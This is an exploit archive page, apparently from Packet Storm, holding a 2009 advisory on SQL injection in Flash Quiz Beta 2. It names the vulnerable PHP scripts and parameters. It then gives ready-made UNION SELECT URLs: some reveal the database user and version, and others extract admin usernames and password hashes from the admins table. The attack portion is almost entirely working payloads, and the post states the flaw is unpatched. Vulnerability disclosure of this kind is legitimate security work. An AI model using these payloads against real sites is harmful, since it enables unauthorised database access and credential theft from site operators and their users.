exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Flash Quiz Beta 2 SQL Injection

Flash Quiz Beta 2 SQL Injection
Posted May 22, 2009
Authored by YEnH4ckEr

Flash Quiz Beta 2 suffers from multiple remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | aeb6b04c2a877b8710db865fb1db1c34d647d1182a255efa2433642109b5022b

Flash Quiz Beta 2 SQL Injection

Change Mirror Download
--------------------------------------------------------------
MULTIPLE SQL INJECTION VULNERABILITIES --Flash Quiz Beta 2-->
--------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://sourceforge.net/projects/flashquiz/
-->DOWNLOAD: http://sourceforge.net/projects/flashquiz/
-->DEMO: N/A
-->CATEGORY: CMS / Testing
-->DESCRIPTION: A Flash quiz system with a PHP/MYSQL back end supporting multiple
quizzes per instance, result tracking, and high score tracking.
-->RELEASED: 2009-04-13

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: N/A
-->CATEGORY: SQL INJECTION
-->AFFECT VERSION: Beta 2 (maybe <= ?)
-->Discovered Bug date: 2009-05-20
-->Reported Bug date: 2009-05-20
-->Fixed bug date: Not fixed
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>


-------
INTRO:
-------


This system is completely vulnerable to sql injection.


-------------------
PROOFS OF CONCEPT:
-------------------


[++] GET var --> 'quiz'

[++] File vuln --> 'num_questions.php'


~~~~~> http://[HOST]/[PATH]/num_questions.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*


[++] GET var --> 'quiz' and 'order_number'

[++] File vuln --> 'answers.php'


~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*

~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*


[++] GET var --> 'quiz'

[++] File vuln --> 'high_score.php'


~~~~~> http://[HOST]/[PATH]/high_score.php?quiz=-1+UNION+ALL+SELECT+version(),2,concat(user(),0x3A3A3A,version()),database(),5,6,7/*


[++] GET var --> 'quiz'

[++] File vuln --> 'high_score_web.php'


~~~~~> http://[HOST]/[PATH]/high_score_web.php?quiz=-1+UNION+ALL+SELECT+version(),2,concat(user(),0x3A3A3A,version()),database(),5,6,7/*


[++] GET var --> 'quiz'

[++] File vuln --> 'results_table_web.php'


~~~~~> http://[HOST]/[PATH]/results_table_web.php?quiz=-1+UNION+ALL+SELECT+version(),user(),concat(user(),0x3A3A3A,version()),database(),current_user(),6,database()/*


[++] GET var --> 'quiz' and 'order_number'

[++] File vuln --> 'question.php'


~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*

~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*


[++[Return]++] ~~~~~> user, version and database in DB.


----------
EXPLOITS:
----------


~~~~~> http://[HOST]/[PATH]/num_questions.php?quiz=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/*

~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/*

~~~~~> http://[HOST]/[PATH]/answers.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/*

~~~~~> http://[HOST]/[PATH]/high_score.php?quiz=-1+UNION+ALL+SELECT+1,2,concat(username,0x3A3A3A,password_hash),4,5,6,7+FROM+admins/*

~~~~~> http://[HOST]/[PATH]/high_score_web.php?quiz=-1+UNION+ALL+SELECT+1,2,concat(username,0x3A3A3A,password_hash),4,5,6,7+FROM+admins/*

~~~~~> http://[HOST]/[PATH]/results_table_web.php?quiz=-1+UNION+ALL+SELECT+1,2,concat(username,0x3A3A3A,password_hash),4,5,6,7+FROM+admins/*

~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/*

~~~~~> http://[HOST]/[PATH]/question.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins/*


[++[Return]++] ~~~~~> username:::password_hash in 'admins' table



#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close